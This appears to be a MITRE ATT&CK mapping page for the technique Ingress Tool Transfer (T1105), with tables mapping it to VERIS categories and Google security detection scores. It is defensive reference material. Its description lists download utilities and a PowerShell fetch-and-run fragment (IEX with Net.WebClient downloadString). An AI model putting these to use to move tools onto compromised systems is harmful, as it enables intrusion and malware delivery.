Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
On Windows, adversaries may use various utilities to download tools, such as copy
, finger
, certutil, and PowerShell commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as curl
, scp
, sftp
, tftp
, rsync
, finger
, and wget
.(Citation: t1105_lolbas)
Adversaries may also abuse installers and package managers, such as yum
or winget
, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows search-ms
protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures).(Citation: T1105: Trellix_search-ms)
Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
View in MITRE ATT&CK®Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
action.hacking.variety.Abuse of functionality | Abuse of functionality. | related-to | T1105 | Ingress Tool Transfer | |
action.hacking.variety.Other | Other | related-to | T1105 | Ingress Tool Transfer | |
action.hacking.vector.Other network service | Network service that is not remote access or a web application. | related-to | T1105 | Ingress Tool Transfer |
Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
google_secops | Google Security Operations | technique_scores | T1105 | Ingress Tool Transfer |
Comments
Google Security Ops is able to trigger an alert based off suspicious system processes that could indicate tool transfer attempts using cURL from Windows machines (e.g., C:\\Windows\\System32\\curl.exe).
This technique was scored as minimal based on low or uncertain detection coverage factor.
https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/windows/suspicious_curl_usage.yaral
References
|
security_command_center | Security Command Center | technique_scores | T1105 | Ingress Tool Transfer |
Comments
SCC uses machine learning [NLP techniques] to evaluate content of an executed bash script. This security solution protects against potentially malicious scripts that are used to transfer tools into a compromised environment and execute commands without binaries. Because of the high threat detection coverage provided by the ML model and near-real time temporal factor this control was graded as significant.
References
|